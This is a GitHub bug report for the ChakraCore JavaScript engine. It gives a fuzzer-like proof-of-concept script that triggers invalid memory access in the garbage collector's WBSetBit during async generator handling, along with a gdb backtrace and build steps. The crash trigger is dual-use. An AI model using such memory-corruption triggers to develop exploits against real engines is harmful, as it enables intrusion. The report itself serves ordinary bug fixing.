Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Invalid Memory Access in WBSetBit #6699

Closed
xuelanxu opened this issue Apr 12, 2021 · 0 comments · Fixed by #6700
Closed

Invalid Memory Access in WBSetBit #6699

xuelanxu opened this issue Apr 12, 2021 · 0 comments · Fixed by #6700
Labels
Bug Duplicate

Comments

@xuelanxu
Copy link

PoC:

function main() {
const v2 = async (v3,v4,...v5) => {
};
const v9 = {call:v2,has:eval};
async function v10(v11,v12,v13,v14) {
    for (let v17 = 0; v17 < 257; v17++) {
        const v22 = [13.37,13.37,13.37,4294967296,13.37];
        const v23 = [13.37];
        const v24 = ["s2cshfCfBy"];
        const v25 = {__proto__:v24,a:"-4294967297",d:v24,e:v22,length:4294967296,toString:arguments,valueOf:v23};
        const v26 = await v9;
    }
    const v30 = [257,0,10,9007199254740992];
}
const v31 = v10();
}
main();

Backtrace:

(gdb) bt
#0  0x00007fd77b8014ef in ?? ()
#1  0x00000ffaef74fc61 in ?? ()
#2  0x00007fd77ba865d0 in ?? ()
#3  0x00000ffaef75cd0f in ?? ()
#4  0x00007fd77bae6870 in ?? ()
#5  0x00007fd77b801000 in ?? ()
#6  0x00007fd77b837000 in ?? ()
#7  0x00007fffb6663260 in ?? ()
#8  0x000055d8df6fd899 in Memory::Recycler::WBSetBit (addr=0x7fd77ba8a000 "") at /src/chakracore/lib/Common/Memory/Recycler.cpp:9227
#9  0x000055d8e19176ae in amd64_CallFunction () at /src/chakracore/lib/Runtime/Library/amd64/JavascriptFunctionA.S:100
#10 0x000055d8e0e74f98 in Js::JavascriptGenerator::CallGenerator (this=<optimized out>, data=<optimized out>, resumeKind=<optimized out>) at /src/chakracore/lib/Runtime/Library/JavascriptGenerator.cpp:185
#11 0x000055d8e0de62d9 in Js::JavascriptAsyncFunction::AsyncSpawnStep (stepFunction=0x7fd778b3b690, generator=0x7fd77ba83060, resolve=0x7fd77baa3300, reject=0x7fd77baa3360) at /src/chakracore/lib/Runtime/Library/JavascriptAsyncFunction.cpp:151
#12 0x000055d8e0de8a68 in Js::JavascriptAsyncFunction::EntryAsyncSpawnCallStepFunction (function=<optimized out>, callInfo=...) at /src/chakracore/lib/Runtime/Library/JavascriptAsyncFunction.cpp:130
#13 0x000055d8e15bf2f6 in Js::JavascriptPromise::EntryReactionTaskFunction (function=<optimized out>, callInfo=...) at /src/chakracore/lib/Runtime/Library/JavascriptPromise.cpp:1074
#14 0x000055d8e19176ae in amd64_CallFunction () at /src/chakracore/lib/Runtime/Library/amd64/JavascriptFunctionA.S:100
#15 0x000055d8e0e51f37 in Js::JavascriptFunction::CallRootFunctionInternal (obj=<optimized out>, args=..., scriptContext=<optimized out>, inScript=<optimized out>) at /src/chakracore/lib/Runtime/Library/JavascriptFunction.cpp:772
#16 0x000055d8e0e516ed in Js::JavascriptFunction::CallRootFunction (obj=<optimized out>, scriptContext=<optimized out>, inScript=true, args=...) at /src/chakracore/lib/Runtime/Library/JavascriptFunction.cpp:717
#17 Js::JavascriptFunction::CallRootFunction (this=<optimized out>, args=..., scriptContext=<optimized out>, inScript=<optimized out>) at /src/chakracore/lib/Runtime/Library/JavascriptFunction.cpp:832
#18 0x000055d8df20d7c8 in JsCallFunction::$_67::operator() (_actionEntryPopper=..., this=<optimized out>, scriptContext=<optimized out>) at /src/chakracore/lib/Jsrt/Jsrt.cpp:2842
#19 _JsErrorCode ContextAPIWrapper<false, JsCallFunction::$_67>(JsCallFunction::$_67)::{lambda(Js::ScriptContext*)#1}::operator()(Js::ScriptContext*) const (this=<optimized out>, scriptContext=<optimized out>) at /src/chakracore/lib/Jsrt/JsrtInternal.h:237
#20 ContextAPIWrapper_Core<false, _JsErrorCode ContextAPIWrapper<false, JsCallFunction::$_67>(JsCallFunction::$_67)::{lambda(Js::ScriptContext*)#1}>(_JsErrorCode ContextAPIWrapper<false, JsCallFunction::$_67>(JsCallFunction::$_67)::{lambda(Js::ScriptContext*)#1}) (fn=...) at /src/chakracore/lib/Jsrt/JsrtInternal.h:192
#21 ContextAPIWrapper<false, JsCallFunction::$_67> (fn=...) at /src/chakracore/lib/Jsrt/JsrtInternal.h:235
#22 JsCallFunction (function=0x7fd778b38870, args=0x7fffb6663da0, cargs=1, result=0x7fffb6663dc0) at /src/chakracore/lib/Jsrt/Jsrt.cpp:2804
#23 0x000055d8df014282 in ChakraRTInterface::JsCallFunction (function=0x7fd778b38870, arguments=<optimized out>, argumentCount=1, result=0x7fffb6663dc0) at /src/chakracore/bin/ch/ChakraRtInterface.h:416
#24 WScriptJsrt::CallbackMessage::CallFunction (this=0x7fffb6663dc0, fileName=<optimized out>) at /src/chakracore/bin/ch/WScriptJsrt.cpp:1993
#25 0x000055d8defe692e in MessageQueue::ProcessAll (this=<optimized out>, fileName=<optimized out>) at /src/chakracore/bin/ch/MessageQueue.h:256
#26 RunScript (fileName=0x6040000006d0 "WBSetBit.js",
    fileContents=0x616000000380 "function main() {\nconst v2 = async (v3,v4,...v5) => {\n};\nconst v9 = {call:v2,has:eval};\nasync function v10(v11,v12,v13,v14) {\n    for (let v17 = 0; v17 < 257; v17++) {\n        const v22 = [13.37,13.37"...,
    fileLength=140736253542352, fileContentsFinalizeCallback=0x55d8defffed0 <WScriptJsrt::FinalizeFree(void*)>, bufferValue=0x0, fullPath=<optimized out>, parserStateCache=<optimized out>) at /src/chakracore/bin/ch/ch.cpp:605
#27 0x000055d8defeab65 in ExecuteTest (fileName=0x6040000006d0 "WBSetBit.js") at /src/chakracore/bin/ch/ch.cpp:1152
#28 0x000055d8defec029 in ExecuteTestWithMemoryCheck (fileName=0x55d8e4e58660 "") at /src/chakracore/bin/ch/ch.cpp:1203
#29 main (argc=<optimized out>, c_argv=<optimized out>) at /src/chakracore/bin/ch/ch.cpp:1538

How to reproduce it:

- ./build.sh -d -j
- ch poc.js
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
Bug Duplicate
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Fix Errors in Generator Jit for SlotArray and CopyProp Restores rhuanjl/ChakraCore
2 participants
@rhuanjl @xuelanxu